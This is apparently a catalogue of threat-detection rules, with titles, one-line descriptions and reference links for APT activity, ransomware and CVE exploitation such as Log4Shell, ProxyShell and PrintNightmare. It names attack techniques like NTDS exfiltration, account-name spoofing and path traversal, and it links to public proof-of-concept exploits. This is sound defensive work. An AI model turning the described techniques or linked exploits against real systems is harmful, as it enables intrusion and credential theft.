Potential Ursnif Malware Activity - Registry Detects registry keys related to Ursnif malware. https://blog.yoroi.company/research/ursnif-long-live-the-steganography/, https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local https://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg
APT31 Judgement Panda Activity Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
APT40 Dropbox Tool User Agent Detects suspicious user agent string of APT40 Dropbox tool Internal research from Florian Roth
Potential Russian APT Credential Theft Activity Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
Potential EmpireMonkey Activity Detects potential EmpireMonkey APT activity https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/, https://malpedia.caad.fkie.fraunhofer.de/actor/anthropoid_spider
Equation Group DLL_U Export Function Load Detects a specific export function name used by one of EquationGroup tools https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=, https://twitter.com/cyb3rops/status/972186477512839170
Mustang Panda Dropper Detects specific process parameters as used by Mustang Panda droppers https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/, https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/, https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
Operation Wocao Activity Detects activity mentioned in Operation Wocao report https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/, https://twitter.com/SBousseaden/status/1207671369963646976
Operation Wocao Activity - Security Detects activity mentioned in Operation Wocao report https://web.archive.org/web/20200226212615/https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/, https://web.archive.org/web/20200226212615/https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf, https://twitter.com/SBousseaden/status/1207671369963646976
CVE-2020-0688 Exploitation Attempt Detects CVE-2020-0688 Exploitation attempts https://github.com/Ridter/cve-2020-0688
CVE-2020-0688 Exchange Exploitation via Web Log Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688 https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/
CVE-2020-0688 Exploitation via Eventlog Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688 https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/, https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/
CVE-2020-10148 SolarWinds Orion API Auth Bypass Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts https://kb.cert.org/vuls/id/843464
DNS RCE CVE-2020-1350 Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/, https://web.archive.org/web/20230329172447/https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html
Potential Emotet Rundll32 Execution Detects Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html, https://cyber.wtf/2021/11/15/guess-whos-back/
CVE-2020-5902 F5 BIG-IP Exploitation Attempt Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902 https://support.f5.com/csp/article/K52145254, https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/, https://twitter.com/yorickkoster/status/1279709009151434754, https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/
Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195 Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195 https://support.citrix.com/article/CTX276688, https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/, https://dmaasland.github.io/posts/citrix.html
ComRAT Network Communication Detects Turla ComRAT network communication. https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC Detects the execution of the commonly used ZeroLogon PoC executable. https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Suspicious PrinterPorts Creation (CVE-2020-1048) Detects new commands that add a new printer port pointing to a suspicious file https://windows-internals.com/printdemon-cve-2020-1048/
Exploited CVE-2020-10189 Zoho ManageEngine Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html, https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224
CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability. https://windows-internals.com/printdemon-cve-2020-1048/
TerraMaster TOS CVE-2020-28188 Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188 https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/, https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
Blue Mockingbird Attempts to detect system changes made by Blue Mockingbird https://redcanary.com/blog/blue-mockingbird-cryptominer/
GALLIUM IOCs Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report. https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/, https://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml
Potential Maze Ransomware Activity Detects specific process characteristics of Maze ransomware word document droppers https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html, https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/, https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/
Trickbot Malware Activity Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe" https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20, https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/
Potential Ke3chang/TidePool Malware Activity Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020 https://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf, https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
EvilNum APT Golden Chickens Deployment Via OCX Files Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/, https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/
Cisco ASA FTD Exploit CVE-2020-3452 Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (successful exploitation) https://twitter.com/aboul3la/status/1286012324722155525, https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter
FlowCloud Registry Markers Detects FlowCloud malware registry markers from threat group TA410. The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components. https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
Oracle WebLogic Exploit CVE-2020-14882 Detects exploitation attempts on WebLogic servers https://isc.sans.edu/diary/26734, https://twitter.com/jas502n/status/1321416053050667009?s=20, https://twitter.com/sudo_sudoka/status/1323951871078223874
Lazarus Group Activity Detects different process execution behaviors as described in various threat reports on Lazarus group activity https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/, https://www.hvs-consulting.de/lazarus-report/
GALLIUM Artefacts - Builtin Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)
Leviathan Registry Key Activity Detects registry key used by Leviathan APT in Malaysian focused campaign https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign
Solarwinds SUPERNOVA Webshell Access Detects access to SUPERNOVA webshell as described in Guidepoint report https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/, https://www.anquanke.com/post/id/226029
UNC2452 Process Creation Patterns Detects specific process creation patterns as used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
Greenbug Espionage Group Indicators Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
UNC2452 PowerShell Pattern Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware, https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command
Suspicious VBScript UN2452 Pattern Detects suspicious inline VBScript keywords as used by UNC2452 https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
TAIDOOR RAT DLL Load Detects specific process characteristics of Chinese TAIDOOR RAT malware load https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a
Winnti Malware HK University Campaign Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Hong Kong universities https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/
Winnti Pipemon Characteristics Detects specific process characteristics of Winnti Pipemon malware reported by ESET https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/, https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/
CVE-2021-31979 CVE-2021-33771 Exploits Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/, https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/
Arcadyan Router Exploitations Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091. https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2, https://www.tenable.com/security/research/tra-2021-13, https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
Possible Exploitation of Exchange RCE CVE-2021-42321 Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321
Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection Detects the suspicious file that is created by PoC code against the Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare) and CVE-2021-1675. https://twitter.com/mvelazco/status/1410291741241102338, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
CVE-2021-1675 Print Spooler Exploitation Filename Pattern Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare, https://github.com/cube0x0/CVE-2021-1675
Possible CVE-2021-1675 Print Spooler Exploitation Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675 https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare, https://twitter.com/fuzzyf10w/status/1410202370835898371
CVE-2021-1675 Print Spooler Exploitation Detects driver load events in the print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 https://twitter.com/MalwareJake/status/1410421967463731200
CVE-2021-1675 Print Spooler Exploitation IPC Access Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 https://twitter.com/INIT_3/status/1410662463641731075
Oracle WebLogic Exploit CVE-2021-2109 Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109 https://twitter.com/pyn3rd/status/1351696768065409026, https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw
CVE-2021-21972 VSphere Exploitation Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972 https://www.vmware.com/security/advisories/VMSA-2021-0002.html, https://f5.pm/go-59627.html, https://swarm.ptsecurity.com/unauth-rce-vmware
CVE-2021-21978 Exploitation Attempt Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978 https://twitter.com/wugeej/status/1369476795255320580, https://paper.seebug.org/1495/
VMware vCenter Server File Upload CVE-2021-22005 Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server. https://kb.vmware.com/s/article/85717, https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server
Fortinet CVE-2021-22123 Exploitation Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection
Pulse Connect Secure RCE Attack CVE-2021-22893 This rule detects exploitation attempts using the Pulse Connect Secure (PCS) vulnerability CVE-2021-22893 https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html, https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784
Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 https://nvd.nist.gov/vuln/detail/CVE-2021-26084, https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html, https://github.com/h3v0x/CVE-2021-26084_Confluence
Potential CVE-2021-26084 Exploitation Attempt Detects potential exploitation of CVE-2021-26084, a Confluence RCE using OGNL injection https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md, https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md, https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html, https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/
Exploitation of CVE-2021-26814 in Wazuh Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814 https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py
Potential CVE-2021-26857 Exploitation Attempt Detects possible successful exploitation of the vulnerability described in CVE-2021-26857 by looking for abnormal subprocesses spawned by Exchange Server's Unified Messaging service https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
CVE-2021-26858 Exchange Exploitation Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for creation of non-standard files on disk by Exchange Server’s Unified Messaging service which could indicate dropping web shells or other malicious content https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
ProxyLogon Reset Virtual Directories Based On IIS Log When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c
Potential CVE-2021-27905 Exploitation Attempt Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1. https://twitter.com/Al1ex4/status/1382981479727128580, https://twitter.com/sec715/status/1373472323538362371, https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/, https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186, https://github.com/murataydemir/CVE-2021-27905
Exchange Exploitation CVE-2021-28480 Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480 https://twitter.com/GossiTheDog/status/1392965209132871683?s=20
CVE-2021-33766 Exchange ProxyToken Exploitation Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766 https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server
Serv-U Exploitation CVE-2021-35211 by DEV-0322 Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322 https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
Suspicious Word Cab File Write CVE-2021-40444 Detects file creation patterns noticeable during the exploitation of CVE-2021-40444 https://twitter.com/RonnyTNL/status/1436334640617373699?s=20, https://twitter.com/vanitasnk/status/1437329511142420483?s=21
Potential CVE-2021-40444 Exploitation Attempt Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444, https://twitter.com/neonprimetime/status/1435584010202255375, https://www.joesandbox.com/analysis/476188/1/iochtml
Potential Exploitation Attempt From Office Application Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE) https://twitter.com/sbousseaden/status/1531653369546301440, https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190
ADSelfService Exploitation Detects suspicious access to URLs that were noticed in cases in which attackers exploited the ADSelfService vulnerability CVE-2021-40539 https://us-cert.cisa.gov/ncas/alerts/aa21-259a
CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539). https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/, https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html, https://us-cert.cisa.gov/ncas/alerts/aa21-259a
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver, https://www.zerodayinitiative.com/advisories/ZDI-21-1308/
Potential CVE-2021-41379 Exploitation Attempt Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver, https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/, https://www.zerodayinitiative.com/advisories/ZDI-21-1308/, https://www.logpoint.com/en/blog/detecting-privilege-escalation-zero-day-cve-2021-41379/
LPE InstallerFileTakeOver PoC CVE-2021-41379 Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379 https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver
CVE-2021-41773 Exploitation Attempt Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. https://nvd.nist.gov/vuln/detail/CVE-2021-41773, https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782, https://twitter.com/ptswarm/status/1445376079548624899, https://twitter.com/h4x0r_dz/status/1445401960371429381, https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml, https://twitter.com/bl4sty/status/1445462677824761878
Sitecore Pre-Auth RCE CVE-2021-42237 Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx https://blog.assetnote.io/2021/11/02/sitecore-rce/, https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776
Potential CVE-2021-42278 Exploitation Attempt The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object. https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/
Suspicious Computer Account Name Change CVE-2021-42287 Detects the renaming of an existing computer account to an account name that doesn't contain a $ symbol, as seen in attacks against CVE-2021-42287 https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45
Grafana Path Traversal Exploitation CVE-2021-43798 Detects a successful Grafana path traversal exploitation https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/, https://github.com/search?q=CVE-2021-43798
CVE-2021-44077 POC Default Dropped File Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section) https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/, https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py
Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable version of Log4j. https://portswigger.net/daily-swig/vmware-horizon-under-attack-as-china-based-ransomware-group-targets-log4j-vulnerability, https://twitter.com/TheDFIRReport/status/1482078434327244805, https://www.pwndefend.com/2022/01/07/log4shell-exploitation-and-hunting-on-vmware-horizon-cve-2021-44228/
Log4j RCE CVE-2021-44228 Generic Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell) https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/, https://news.ycombinator.com/item?id=29504755, https://github.com/tangxiaofeng7/apache-log4j-poc, https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b, https://github.com/YfryTchsGD/Log4jAttackSurface, https://twitter.com/shutingrz/status/1469255861394866177?s=21
Log4j RCE CVE-2021-44228 in Fields Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell) https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/, https://news.ycombinator.com/item?id=29504755, https://github.com/tangxiaofeng7/apache-log4j-poc, https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b, https://github.com/YfryTchsGD/Log4jAttackSurface, https://twitter.com/shutingrz/status/1469255861394866177?s=21
Exchange ProxyShell Pattern Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful) https://youtu.be/5mqid-7zp8k?t=2231, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
Suspicious RazerInstaller Explorer Subprocess Detects an explorer.exe subprocess of the RazerInstaller software, which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM https://twitter.com/j0nh4t/status/1429049506021138437, https://streamable.com/q2dsji
Successful Exchange ProxyShell Attack Detects URL patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers https://youtu.be/5mqid-7zp8k?t=2231, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
Potential SystemNightmare Exploitation Attempt Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM https://github.com/GossiTheDog/SystemNightmare
SonicWall SSL/VPN Jarrewrite Exploitation Detects exploitation attempts of the SonicWall Jarrewrite Exploit https://web.archive.org/web/20210126045316/https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/, https://github.com/darrenmartyn/VisualDoor
Potential BlackByte Ransomware Activity Detects command line patterns used by BlackByte ransomware in different operations https://redcanary.com/blog/blackbyte-ransomware/
Conti Volume Shadow Listing Detects a command used by Conti to find volume shadow backups https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
Conti NTDS Exfiltration Command Detects a command used by Conti to exfiltrate NTDS https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
Potential Conti Ransomware Activity Detects a specific command used by the Conti ransomware group https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/, https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19
Potential Conti Ransomware Database Dumping Activity Via SQLCmd Detects a command used by Conti to dump a database https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection, https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15
DarkSide Ransomware Pattern Detects DarkSide Ransomware and helpers https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html, https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/, https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2
Potential Devil Bait Related Indicator Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was commonly seen across different Devil Bait samples and stages as described by the NCSC https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf
Potential Devil Bait Malware Reconnaissance Detects specific process behavior observed with Devil Bait samples https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf, https://www.virustotal.com/gui/file/fa71eee906a7849ba3f4bab74edb577bd1f1f8397ca428591b4a9872ce1f1e9b/behavior
Devil Bait Potential C2 Communication Traffic Detects potential C2 communication related to Devil Bait malware https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf
FoggyWeb Backdoor DLL Loading Detects the DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor, which loads a malicious version of the expected "version.dll" DLL https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
Goofy Guineapig Backdoor IOC Detects malicious indicators seen used by the Goofy Guineapig malware https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
Potential Goofy Guineapig Backdoor Activity Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report. https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
Potential Goofy Guineapig GoolgeUpdate Process Anomaly Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
Goofy Guineapig Backdoor Potential C2 Communication Detects potential C2 communication related to Goofy Guineapig backdoor https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
